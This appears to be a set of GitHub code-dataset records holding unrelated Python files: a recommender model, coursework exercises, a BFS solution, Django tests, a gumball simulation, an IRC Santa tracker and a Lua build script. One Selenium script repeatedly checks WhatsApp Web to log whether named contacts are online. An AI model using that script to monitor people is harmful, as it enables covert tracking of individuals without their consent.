return","repo_name":"danieldevpy/ordem-de-servico","sub_path":"src/application/infra/pyside/widgets/custom_radio_button.py","file_name":"custom_radio_button.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1451642946","text":"\"\"\"\nCP1404/CP5632 - Practical\nBroken program to determine score status\n\"\"\"\n\n\ndef main():\n score = float(input(\"Enter score: \"))\n determine_status(score)\n\n\ndef determine_status(score):\n result = 0\n if score < 0:\n return 'Invalid score'\n elif score > 100:\n return 'Invalid score'\n else:\n if score > 100:\n result = \"Invalid score\"\n if 90 > score >= 50:\n result = \"Passable\"\n if score >= 90:\n result = \"Excellent\"\n if score < 50:\n result = \"Bad\"\n return result\n\n\nmain()\n","repo_name":"ironmatt4x4/cp1404practicals","sub_path":"prac_03/broken_score.py","file_name":"broken_score.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31326740079","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport json\n\nfrom tqdm import tqdm\nfrom model.sequence.Encoder import Encoder\nfrom model.sequence.Attention import Attention\nfrom handler.dataset import generate_train_dataset, generate_embedding, generate_evaluation_dataset\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom fire import Fire\n\nclass Recommender(object):\n\n def __init__(self,\n epoch=5,\n batch_size = 256,\n evaluation_ratio = 0.1,\n encoder_units = 256,\n history_length=15):\n\n self.epoch = epoch\n self.batch_size = batch_size\n self.evaluation_ratio = evaluation_ratio\n self.encoder_units = encoder_units\n self.history_length = history_length\n\n self.model = self._build_model()\n\n def _build_model(self):\n\n self.embedding_mx = generate_embedding(path_to_dictionary=\"./data/positional_dictionary.json\",\n path_to_embedding=\"./data/embedding.npz.npy\")\n\n self.vocab_size = self.embedding_mx.shape[0]\n self.embedding_dim = self.embedding_mx.shape[1]\n\n with tf.name_scope(\"data\"):\n user_input = tf.keras.Input(shape=(self.history_length,))\n item_input = tf.keras.Input(shape=(1,))\n\n with tf.name_scope(\"model\"):\n # Sequencial Model\n encoder = Encoder(vocab_size=self.vocab_size,\n embedding_dim=self.embedding_dim,\n enc_units=self.encoder_units,\n batch_size=self.batch_size,\n embedding_mx=self.embedding_mx)\n sample_output, sample_hidden = encoder(user_input)\n # Attention layer\n attention_layer = Attention(units=10, history=self.history_length)\n attension_result, attention_weights = attention_layer(sample_hidden, sample_output)\n # user dense layer\n #user = tf.keras.layers.Dense(units=512, activation=\"relu\")(attension_result)\n user = tf.keras.layers.Dense(units=256, activation=\"relu\")(attension_result)\n user = tf.keras.layers.Dense(units=128, activation=\"relu\")(attension_result)\n user = tf.keras.layers.Dense(units=64, activation=\"relu\")(user)\n # user = tf.keras.layers.Dropout(0.1)(user)\n # item dense layer\n item = encoder.embedding(item_input)\n item = tf.keras.backend.squeeze(item, axis=1)\n item = tf.keras.layers.Dense(units=256, activation=\"relu\")(item)\n item = tf.keras.layers.Dense(units=128, activation=\"relu\")(item)\n item = tf.keras.layers.Dense(units=64, activation=\"relu\")(item)\n # item = tf.keras.layers.Dropout(0.1)(item)\n # dot product\n logit = tf.keras.layers.Dot(axes=1)([user, item])\n pred = tf.keras.layers.Activation(activation='sigmoid')(logit)\n\n with tf.name_scope(\"train\"):\n model = tf.keras.Model(inputs=[user_input, item_input], outputs=pred)\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.0001),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n return model\n\n def train(self):\n data, label = generate_train_dataset(\"./data/test.parquet\")\n filepath = \"./data/checkpoints/more_history/model-{epoch:02d}.hdf5\"\n checkpoint = ModelCheckpoint(filepath,\n monitor='val_acc',\n save_weights_only=True,\n verbose=1)\n self.model.fit(x = data,\n y = label,\n batch_size=self.batch_size,\n shuffle=True,\n epochs=self.epoch,\n callbacks=[checkpoint])\n\n def test(self, test_file):\n\n with open(test_file) as fp:\n ids = [line[:-1] for line in fp]\n\n df = pd.read_parquet(\"./data/test.parquet\")\n df = df.set_index(\"id\")\n item = np.reshape(np.load(\"./data/test_1000.npy\"), (-1, 1))\n with open(\"./data/dictionary.json\") as fp:\n dictionary = json.load(fp)\n dictionary = dict([(value, key) for key, value in dictionary.items()])\n rec_fp = open(\"./recommend.txt\", \"w+\")\n\n self.model.load_weights(\"./data/checkpoints/more_history/model-02.hdf5\")\n\n for id in tqdm(ids):\n\n rec_fp.write(\"{} \".format(id))\n\n if not any(df.index.isin([id])):\n\n for i in range(100):\n rec_fp.write(\"{} \".format(item[i][0]))\n rec_fp.write(\"\\n\")\n continue\n\n train = generate_evaluation_dataset(df, id, item.shape[0])\n pred = np.reshape(self.model.predict(x=[train, item], batch_size=self.batch_size), (-1))\n rec = pred.argsort()\n rec = rec[::-1]\n accuracy = [pred[idx] for idx in rec]\n name = [item[elem][0] for elem in rec]\n\n for elem in name:\n rec_fp.write(\"{} \".format(dictionary[elem]))\n rec_fp.write(\"\\n\")\n\n # name_dict = {}\n # for idx, key in enumerate(name):\n # name_dict[key] = idx\n #\n # sample = df.loc[id]\n # for key in np.unique(sample[\"eval\"]):\n # if key in name_dict:\n # print(\"\\n\", name_dict[key])\n # else:\n # print(\"\\n KeyError\")\n\n fp.close()\n\nif __name__ == \"__main__\":\n model = Recommender()\n# model.train()\n model.test(\"./data/predict/dev.users\")\n# Fire(Recommender)\n\n\n\n","repo_name":"k920049/brunch-hgru","sub_path":"model/legacy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4081494552","text":"\"\"\"\nWritten by Joseph Surrey 4/04/2023\nUpdated 21/04/2023 changed format of weights to work with random.choices()\nUpdated 21/04/2023 to add the instructions for the game\nConstants to be used in project\n\"\"\"\n\n# How much the user wins from each token\nTOKEN_VALUE = [[\"unicorn\", 5.0], [\"zebra\", 0.5], [\"horse\", 0.5], [\"donkey\", 0]]\n# Chance of each token being generated\nTOKEN_WEIGHT = [0.1, 0.3, 0.3, 0.3]\n# Maximum spend per game\nMAX_SPEND = 10\n# How much each round costs\nROUND_PRICE = 1\n# Instructions\nINSTRUCTIONS = \"Instructions for Lucky Unicorn game\"\n","repo_name":"josephsurrey/Lucky-Unicorn_2.01","sub_path":"setup_v1.py","file_name":"setup_v1.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42690136584","text":"import sys\nfrom collections import deque\n\ndef bfs(q, time):\n while q:\n time += 1\n for _ in range(len(q)):\n p = q.popleft()\n if p == k:\n return time\n a, b, c = p-1, p+1, 2*p\n if (0 <= a <= 100000) and graph[a] == 0:\n graph[a] = 1\n q.append(a)\n if (0 <= b <= 100000) and graph[b] == 0:\n graph[b] = 1\n q.append(b)\n if (0 <= c <= 100000) and graph[c] == 0:\n graph[c] = 1\n q.append(c)\n\nn, k = map(int, sys.stdin.readline().split())\n\ngraph = [0] * 100001\ngraph[n] = 1\nq = deque()\nq.append(n)\ntime = -1\nprint(bfs(q, time))","repo_name":"ecvheo1/Algorithms","sub_path":"BOJ/DFS & BFS/1697.py","file_name":"1697.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39666022446","text":"import asyncio\nimport os\nfrom unittest import mock\n\nimport pytest\nfrom async_asgi_testclient import TestClient\nfrom django.http import HttpResponse\nfrom django.urls.conf import path\n\nfrom django_simple_task import defer\n\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"tests.settings\"\n\n\n@pytest.fixture\nasync def get_app():\n async def _get_app(patterns, asgi_version=3, inner_asgi_version=3):\n from . import urls, app\n\n urls.urlpatterns.clear()\n urls.urlpatterns.extend(patterns)\n test_app = (\n app.application\n if inner_asgi_version == 3\n else app.application_wrapping_asgi2\n )\n if asgi_version == 2:\n return app.application_wrapt_as_asgi2\n return test_app\n\n return _get_app\n\n\n@pytest.mark.asyncio\nasync def test_sanity_check(get_app):\n def view(requests):\n return HttpResponse(\"Foo\")\n\n app = await get_app([path(\"\", view)])\n async with TestClient(app) as client:\n resp = await client.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo\"\n\n app_asgi2 = await get_app([path(\"\", view)], 2)\n async with TestClient(app_asgi2) as client_asgi2:\n resp = await client_asgi2.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo\"\n\n app_wrapping_asgi2 = await get_app([path(\"\", view)], 3, 2)\n async with TestClient(app_asgi2) as client_asgi2:\n resp = await client_asgi2.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo\"\n\n\n@pytest.mark.asyncio\nasync def test_should_call_task(get_app):\n task = mock.MagicMock()\n\n def view(requests):\n defer(task)\n return HttpResponse(\"Foo1\")\n\n app = await get_app([path(\"\", view)])\n async with TestClient(app) as client:\n task.assert_not_called()\n resp = await client.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo1\"\n task.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_should_call_async_task(get_app):\n cb = mock.MagicMock()\n\n async def task():\n await asyncio.sleep(1)\n cb()\n\n def view(requests):\n defer(task)\n defer(task)\n defer(task)\n defer(task)\n return HttpResponse(\"Foo\")\n\n app = await get_app([path(\"\", view)])\n async with TestClient(app) as client:\n cb.assert_not_called()\n resp = await client.get(\"/\")\n assert resp.text == \"Foo\"\n cb.assert_not_called()\n assert cb.call_count == 4\n","repo_name":"ericls/django-simple-task","sub_path":"tests/test_django_simple_task.py","file_name":"test_django_simple_task.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"31"} +{"seq_id":"38694762969","text":"## Gumball Counting Project ##\nimport math\nimport numpy as np\nfrom scipy.stats import norm, sem, t\nimport matplotlib.pyplot as plt\n\n# Total gumballs: 659\n\n\ndef volume_of_cylinder(height, circumference):\n # V = πr^2h\n ## NOTE: r = C/(2*pi)\n radius = circumference/(2*math.pi)\n return math.pi * (radius ** 2) * height\n\n\ndef volume_of_sphere(diameter):\n # V = 4/3πr^3 \n ## NOTE: r = C/(2*pi)\n radius = diameter/2\n return (4/3) * math.pi * radius**3\n\n\ndef estimate_gumballs_in_jar(jar_height, jar_diameter, gumball_diameter, jar_fill_percentage, packing_efficiency):\n jar_volume = volume_of_cylinder(jar_height, jar_diameter)\n gumball_volume = volume_of_sphere(gumball_diameter) # Assuming gumballs are perfectly cylindrical\n \n # The volume of space in the jar that the gumballs can fill is \n # the jar's volume times the packing efficiency times the fill percentage\n space_for_gumballs = jar_volume * packing_efficiency * jar_fill_percentage\n \n # Now we can find how many gumballs can fit in this space\n estimated_gumballs = space_for_gumballs / gumball_volume\n return estimated_gumballs\n\n\ndef simulate_gumball_estimations(jar_height, jar_diameter, gumball_diameter, jar_fill_percentage, num_simulations):\n # Store the results of all simulations here\n all_estimations = []\n\n for _ in range(num_simulations):\n # Sample packing efficiency from a beta distribution \n # Shift and scale to be in the range [0.64, 0.74]\n packing_efficiency = 0.64 + np.random.beta(a=2, b=5) * 0.1\n\n # Randomly vary gumball diameter by +/- 10%\n varied_gumball_diameter = gumball_diameter * np.random.uniform(0.99, 1.01)\n\n estimation = estimate_gumballs_in_jar(jar_height, \n jar_diameter, \n varied_gumball_diameter, \n jar_fill_percentage, \n packing_efficiency)\n all_estimations.append(estimation)\n \n # Calculate standard error of the mean (SEM) and 95% Confidence Interval\n mu = np.mean(all_estimations)\n std = np.std(all_estimations)\n med = np.median(all_estimations)\n standard_error = sem(all_estimations)\n confidence_interval = t.interval(confidence=0.95, \n df=len(all_estimations)-1, \n loc=mu, \n scale=standard_error)\n return all_estimations, mu, std, med, standard_error, confidence_interval, packing_efficiency\n\n\ndef plot_histogram_with_distribution(all_estimations, mu, std, num_simulations):\n # Fit a normal distribution to the data\n _, _ = norm.fit(all_estimations)\n \n # Plot the histogram\n plt.hist(all_estimations, bins=25, density=True, alpha=0.6, color='g')\n\n # Plot the distribution\n xmin, xmax = plt.xlim()\n x = np.linspace(xmin, xmax, 100)\n p = norm.pdf(x, mu, std)\n plt.plot(x, p, 'k', linewidth=2)\n\n # Add a red dashed line at the mean (apex of the distribution)\n plt.axvline(mu, color='r', linestyle='dashed', linewidth=2)\n \n plt.title(f\"Fit Results for {num_simulations} Runs\")\n plt.show()\n\n\ndef box_and_whisker_plot(all_estimations):\n plt.figure(figsize=(10,6))\n plt.boxplot(all_estimations, vert=False)\n plt.title('Box and Whisker Plot of Estimations')\n plt.xlabel('Estimated Number of Gumballs')\n plt.show()\n\n\ndef plot_cdf(all_estimations):\n plt.figure(figsize=(10,6))\n values, base = np.histogram(all_estimations, bins=40)\n cumulative = np.cumsum(values) / np.sum(values)\n plt.plot(base[:-1], cumulative)\n\n # Adding the red dashed lines for median\n median = np.median(all_estimations)\n plt.axvline(median, color='r', linestyle='dashed', linewidth=2)\n plt.axhline(0.5, color='r', linestyle='dashed', linewidth=2)\n\n plt.title('Cumulative Distribution Function (CDF) of Estimations')\n plt.xlabel('Estimated Number of Gumballs')\n plt.ylabel('Cumulative Probability')\n plt.show()\n \n\ndef run_and_plot(jar_height, jar_diameter, gumball_diameter, jar_fill_percentage, simulation_counts):\n results = []\n for i, num_simulations in enumerate(simulation_counts, start=1):\n all_estimations, mu, std, med, sem, ci, packing_efficiency = simulate_gumball_estimations(jar_height, \n jar_diameter, \n gumball_diameter, \n jar_fill_percentage, \n num_simulations)\n \n # Uncomment the following lines as needed to produce the different plots\n plot_histogram_with_distribution(all_estimations, mu, std, num_simulations)\n box_and_whisker_plot(all_estimations)\n #plot_cdf(all_estimations)\n \n results.append((mu, std, sem, ci))\n print(f\"Run {i}: Mean = {mu:.2f}; Median = {med:.2f}, Std Dev = {std:.2f}; SEM = {sem:.2f}; CI = ({round(ci[0], 2)}, {round(ci[1], 2)})\")\n return results\n\n\n# Model Inputs\n'''\nThe variable 'a' represents manual measurements of randomly selected gumballs\nso an average diameter could be established. \n\nSEM = Standard Error of the Mean\n'''\na = [15,15,15,15,16,16,16,15.5,15,15.5,15.5,15,15.5,15,15.5,15,15,15,\n 15,15,15.5,15.5,15,15.5,15.5,15.5,15.5,15,15.5,15.5,15,15,15,15.5,\n 15.5,15,15,15,15.5,15,15.5,15.5,15,15.5,15.5,15,15,15.5,15,15.5,\n 15.5,15.5,15,15.5,15.5,15.5,16,16,15,15,15,15] # mm\n\navg_gumball_diameter = np.mean(a) # mm\nnum_simulations = [10, 100, 1000, 10000]\njar_height = 0.144 # m\nfree_space = 0.076 # m\nused_height = jar_height - free_space # m\njar_circimference = 0.453 # m\ngumball_diameter = avg_gumball_diameter/1000 # m\n\ntotal_cylinder_volume = volume_of_cylinder(jar_height,jar_circimference) # m^3\nused_cylinder_volume = volume_of_cylinder(used_height,jar_circimference) # m^3\njar_fill_percentage = (used_cylinder_volume/total_cylinder_volume) * 0.7\n\nmeans = run_and_plot(jar_height, jar_circimference, gumball_diameter, \n jar_fill_percentage, \n num_simulations)\n\nactual_gumball_count = 97+83+104\npredicted_gumball_count = int(np.floor(means[3][0]))\nexperimental_accuracy = (predicted_gumball_count/actual_gumball_count)*100\nprint(f\"Experimental Accuracy: {experimental_accuracy:.2f}%\")\n","repo_name":"NavyDevilDoc/Gumball_Counting","sub_path":"Gumball_Counting.py","file_name":"Gumball_Counting.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20426790049","text":"import os\nimport random\nimport torch\nimport numpy as np\nimport datetime\nfrom transformers import AutoTokenizer\n\n# seed \ndef seed_everything(seed: int = 42, contain_cuda: bool = False):\n os.environ['PYTHONHASHSEED'] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n print(f\"Seed set as {seed}\")\n\n# tokenizer\ndef get_tokenizer():\n tokenizer = AutoTokenizer.from_pretrained(\"kykim/bert-kor-base\")\n return tokenizer\n \n# token \ndef sentence_to_token(dataset,tokenizer):\n labels = dataset['label'].values\n input_ids = []\n attention_masks = []\n\n for sent in dataset['sentence']:\n encoded_dict = tokenizer.encode_plus(\n sent, \n add_special_tokens = True, \n max_length = 64, \n pad_to_max_length = True,\n return_attention_mask = True, \n return_tensors = 'pt', \n )\n \n input_ids.append(encoded_dict['input_ids'])\n attention_masks.append(encoded_dict['attention_mask'])\n\n\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n labels = torch.tensor(labels)\n return input_ids, attention_masks, labels\n\n# score\ndef flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\n# time\ndef format_time(elapsed):\n elapsed_rounded = int(round((elapsed)))\n return str(datetime.timedelta(seconds=elapsed_rounded))","repo_name":"JDK6259/Korean-Language-Classification","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18702341429","text":"import time\nimport os\n\n# selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import DesiredCapabilities\nfrom selenium.webdriver.chrome.service import Service\n\n# kill all chrome and chromedriver process\nos.system(\"pkill chrome\")\nos.system(\"pkill chromedriver\")\n\n# web page elements path\nNEW_CHAT_BTN = \"/html/body/div[1]/div/div/div[3]/div/header/div[2]/div/span/div[2]/div/span\"\nINPUT_TXT_BOX = \"/html/body/div[1]/div/div/div[2]/div[1]/span/div/span/div/div[1]/div/div/div[2]/div/div[2]\"\nONLINE_STATUS_LABEL = \"/html/body/div[1]/div/div/div[4]/div/header/div[2]/div[2]/span\"\n\n# chat list of users\nTARGETS = {'whatsapp user 1 name': 'phone number 1',\n 'whatsapp user 2 name': 'phone number 2'}\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--user-data-dir=/home/bhagirath/.config/google-chrome/\")\noptions.add_argument(\"--profile-directory=Default\")\ncapabilities = DesiredCapabilities.CHROME.copy()\n\nservice = Service(\"./driver/chromedriver\")\n\nbrowser = webdriver.Chrome(service=service, options=options, desired_capabilities=capabilities)\n\nbrowser.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(browser, 60)\n\nwhile True:\n for target in TARGETS:\n tryAgain = True\n new_chat_title = wait.until(\n EC.presence_of_element_located((By.XPATH, NEW_CHAT_BTN)))\n while (tryAgain):\n try:\n new_chat_title.click()\n input_box = wait.until(\n EC.presence_of_element_located((By.XPATH, INPUT_TXT_BOX)))\n time.sleep(0.5)\n input_box.send_keys(TARGETS[target])\n time.sleep(0.5)\n input_box.send_keys(Keys.ENTER)\n time.sleep(2)\n tryAgain = False\n try:\n try:\n browser.find_element(By.XPATH, ONLINE_STATUS_LABEL)\n print(target + ' is online')\n except:\n print(target + ' is offline')\n time.sleep(1)\n except:\n print('Exception 1 : status is not exist.')\n time.sleep(10)\n except:\n print('Exception 2 : chat is not exist.')\n time.sleep(4)\n","repo_name":"bhagirath-radadiya/whatsapp-online-status-tracker","sub_path":"whatsapp_selenium.py","file_name":"whatsapp_selenium.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74936263766","text":"# https://youtu.be/FB0KUhsxXGY\n\nclass Solution:\n def minimumSubsetSum(self, nums):\n total = sum(nums)\n s = total // 2\n n = len(nums)\n dp = [[False] * (s+1) for _ in range(n)]\n\n for i in range(n):\n dp[i][0] = True\n\n for j in range(1, s+1):\n dp[0][j] = nums[0] == j\n\n for i in range(1, n):\n for j in range(1, s+1):\n if dp[i-1][j]:\n dp[i][j] = dp[i-1][j]\n elif j >= nums[i]:\n dp[i][j] = dp[i-1][j-nums[i]]\n\n for j in range(s, -1, -1):\n if dp[n-1][j]:\n # ans = abs(sum1 - sum2); sum1 = j; sum2 = total - j\n return abs(j - (total - j))\n","repo_name":"AlveeM/coding-problems-old","sub_path":"dynamic-programming/patterns-dynamic-programming/01-0_1-knapsack/03_minimum_subset_sum_difference.py","file_name":"03_minimum_subset_sum_difference.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22293451080","text":"\n# 10. Create a class BANK and with two function simple interest and compound interest. \n# U need to create instance for pnb, icici and hdfc banks with corresponding input.\n\nclass BANK:\n def __init__(self, principle, rate, time):\n self.Principle = principle\n self.Rate = rate\n self.Time = time\n\n def simpleInterest(self):\n Amount = (self.Principle*self.Rate*self.Time)/100\n return Amount\n\n def compoundInterest(self):\n Amount = self.Principle*(pow((1 + self.Rate/100), self.Time)) - self.Principle\n return Amount\n\nbName = input(\"Please Enter your Bank Name pnb/icici/hdfc: \")\nprinciple = int(input(\"Please enter your principle amount: \"))\nrate = int(input(\"please enter rate: \"))\ntime = int(input(\"Please enter time: \"))\n\nif(bName == \"pnb\"):\n pnb = BANK(principle, rate, time)\n print(\"PNB simple inerest: \", pnb.simpleInterest())\n print(\"PNB compound inerest: \", pnb.compoundInterest())\nelif(bName == \"icici\"):\n icici = BANK(principle, rate, time)\n print(\"ICICI simple inerest: \", icici.simpleInterest())\n print(\"ICICI compound inerest: \", icici.compoundInterest())\nelif(bName == \"hdfc\"):\n hdfc = BANK(principle, rate, time)\n print(\"HDFC simple inerest: \", hdfc.simpleInterest())\n print(\"HDFC compound inerest: \", hdfc.compoundInterest())\nelse:\n print(\"you enter invalid bank name please try again !!!\")","repo_name":"AnujKV123/python-Assignments","sub_path":"Assignment3_Anuj_Verma/question10.py","file_name":"question10.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33383244991","text":"#!/usr/bin/python3\n# coding=utf-8\n\n\"\"\"\nThe Santa tracking module for schongo :D\n\"\"\"\n\nimport urllib.request as request\nfrom time import time\nimport json\n__info__ = {\n\t\"Author\": \"Ross Delinger\",\n\t\"Version\": \"1.1\",\n\t\"Dependencies\": [\n\t\t\"_timer\"\n\t]\n}\nglobal chan, net, lastLoc\nchan = ''\nnet = ''\ndataURL = \"http://www.noradsanta.org/js/data.js\"\nlastLoc = ''\ndef onLoad():\n\tdata = request.urlopen(request.Request(dataURL)).read()\n\tdata = data.split(b\"=\",1)[1]\n\tlocList = json.loads(data.decode('utf-8'))\n\tprint(\"Entries: %d\" % len(locList))\n\n\t@timer(60,True)\n\tdef updateTimer():\n\t\tglobal lastLoc,net,chan\n\t\tcurrentTotal = (int(time()) - 1324710000) / 60;\n\n\t\tfor stop in locList:\n\t\t\tt = stop['time'].split(':')\n\t\t\th = int(t[0])\n\t\t\tm = int(t[1])\n\t\t\ttotal = (h * 60) + m\n\t\t\toffset = stop['travel_time'].split(\":\")\n\t\t\tif offset == ['']:\n\t\t\t\toffset = ['','']\n\t\t\tif offset[0] != '':\n\t\t\t\toffsetH = int(offset[0])\n\t\t\telse:\n\t\t\t\toffsetH = 0\n\t\t\tif offset[1] != '':\n\t\t\t\toffsetM = int(offset[1])\n\t\t\telse:\n\t\t\t\toffsetM = 0\n\t\t\toffsetTotal = (offsetH * 60) + offsetM\n\t\t\tif currentTotal > total and currentTotal < (total + offsetTotal):\n\t\t\t\tloc = stop['full_location']\n\t\t\t\tif loc != lastLoc:\n\t\t\t\t\tctx = IrcContext(net, chan, None)\n\t\t\t\t\tctx.reply(\"Current location: %s\" % loc, \"@Santa\")\n\t\t\t\t\tlastLoc = loc\n\t\t\t\t\tbreak;\n\t\treturn True\n\t@command(\"track\", 0, 0)\n\tdef track(ctx, cmd, arg, *args):\n\t\tglobal chan\n\t\tglobal net\n\t\tctx.reply(\"Santa tracking comming online... Engaging json intercept-omatic\", \"SantaTracker\")\n\t\tchan = ctx.chan\n\t\tnet = ctx.irc.network\n\t\tupdateTimer.start()\n\t@hook(\"module_unload\")\n\tdef timer_stop(ctx):\n\t\tupdateTimer.stop()\n","repo_name":"DarkDNA/Schongo-Modules","sub_path":"toys/santa.py","file_name":"santa.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6670458322","text":"from utils import retornarlistas\nimport pandas as pd\n\ndef lista_secoes():\n\n url = \"https://dadosabertos.almg.gov.br/ws/agenda/secoes\"\n response = retornarlistas(url)\n list = response['list']\n df = pd.DataFrame.from_dict(list)\n df.to_excel(r'./agenda/lista_secoes.xlsx')\n\ndef lista_categorias():\n\n url = \"https://dadosabertos.almg.gov.br/ws/agenda/categorias\"\n response = retornarlistas(url)\n print(response)\n\nlista_categorias()","repo_name":"thlanza/python-assembleia","sub_path":"teste-api-dadosabertos/teste-agenda.py","file_name":"teste-agenda.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42309049579","text":"'''\nFile:debug_log.py\nAuthor:ezgameworkplace\nDate:2023/1/6\n'''\nimport functools\nimport inspect\nimport logging\nimport os\n\nfrom green_GA.commands import Commands\n\n\ndef get_command_name(command_value):\n for command_name, value in vars(Commands).items():\n if value == command_value:\n return command_name\n raise ValueError(\"Command value not found.\")\n\n\ndef setup_logging(file_path, size_limit=10000000, count_lines=5000):\n if not os.path.exists(file_path):\n with open(file_path, 'w'):\n pass # 文件不存在时创建一个空文件\n\n logging.basicConfig(filename=file_path,\n level=logging.DEBUG,\n format='%(asctime)s:%(levelname)s:%(message)s')\n\n size = os.path.getsize(file_path) # in bytes\n if size > size_limit:\n with open(file_path, \"r\") as f:\n lines = f.readlines()\n del lines[count_lines:]\n with open(file_path, \"w\") as f:\n f.writelines(lines)\n\n return logging.getLogger()\n\n\ndef debug_log(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n sig = inspect.signature(func)\n bound_args = sig.bind(*args, **kwargs)\n self = bound_args.arguments.get('self')\n\n if self.debug_mode:\n if type(self).__name__ == 'UnitySDK':\n filename = self.port + \".log\"\n else:\n raise Exception(\"打印log的装饰器只可以用于UnitySdk\")\n\n file_path = os.path.join(os.getcwd(), filename)\n logger = setup_logging(file_path)\n logger.setLevel(logging.DEBUG)\n\n command = bound_args.arguments.get('command')\n if command is not None:\n logger.debug(f\"The 'command' argument for {func.__name__} is: {get_command_name(command)}\")\n\n logger.debug(f\"Calling {func.__name__} with args: {args} and kwargs: {kwargs}\")\n try:\n result = func(*args, **kwargs)\n status = 1\n except Exception as e:\n logger.exception(f\"An error occurred while executing {func.__name__}: {e}\")\n result = None\n status = 0\n\n logger.debug(f\"{func.__name__} returned status: {status}\")\n return result\n else:\n return func(*args, **kwargs)\n\n return wrapper\n","repo_name":"ezgameworkplace/green_GA","sub_path":"green_GA/debug_log.py","file_name":"debug_log.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25689199478","text":"import os\nimport re\nfrom subprocess import call \nfrom shutil import copyfile\n\ndef find_luas(dir, targets = None):\n if targets is None: targets = []\n\n items = os.listdir(dir);\n\n for item in items:\n full_path = os.path.join(dir, item);\n\n if os.path.isdir(full_path):\n find_luas(full_path, targets);\n elif os.path.isfile(full_path) and item.endswith(\".lua\"):\n targets.append(full_path);\n\n return targets;\n\n\ndef compile_auxiliaries(opts):\n\n print( \"building auxiliary library...\" );\n\n # compile the auxiliary library with luac\n\n targets = find_luas(opts['auxiliaries_dir'])\n \n command = [opts['luac_path']]\n \n for target in targets:\n print(\" found: {target}\".format(target = target))\n command.append(target)\n\n call(command)\n\n # read generated lua bytecode\n\n generated_file = open(\"luac.out\", 'rb')\n binary_data = generated_file.read()\n generated_file.close()\n\n os.remove(\"luac.out\")\n\n # convert bytecode into a binary string constant\n\n arr_initializer = \"\"\n\n for i in range(0, len(binary_data)):\n if (i % 8 == 0): \n arr_initializer += \"\\n \"\n\n term = hex(binary_data[i])\n \n if (i < len(binary_data) - 1): \n term += \", \"\n\n term = \"(char)\" + term + \" \" * (6 - len(term))\n\n arr_initializer += \"{0}\".format(term)\n\n # write the header file\n\n\n header_preamble = \"// THIS FILE WAS GENERATED BY A SCRIPT - DO NOT EDIT IT DIRECTLY\\n// GENERATED FROM {aux_entry}\\n\".format(\n aux_entry= opts['auxiliaries_dir']\n );\n\n header_source = \"\"\"\n{PREAMBLE}\n\n#pragma once\n#include <{LUA_HEADER}>\n\nint {LOAD_FUNCTION} (lua_State * L) {{\n const char buffer[] = {{{BUFFER}\n }};\n\n return luaL_loadbufferx(L, buffer, sizeof(buffer), \"auxiliary library\", \"b\");\n}};\n \"\"\";\n\n header_source = header_source.format(\n PREAMBLE = header_preamble,\n LUA_HEADER = opts['lua_header'],\n LOAD_FUNCTION = opts['auxiliaries_loadfunc'],\n BUFFER = arr_initializer\n ); \n\n header_file = open(opts['auxiliaries_header'], \"w\");\n header_file.write(header_source);\n header_file.close()\n\n print( \"done.\" 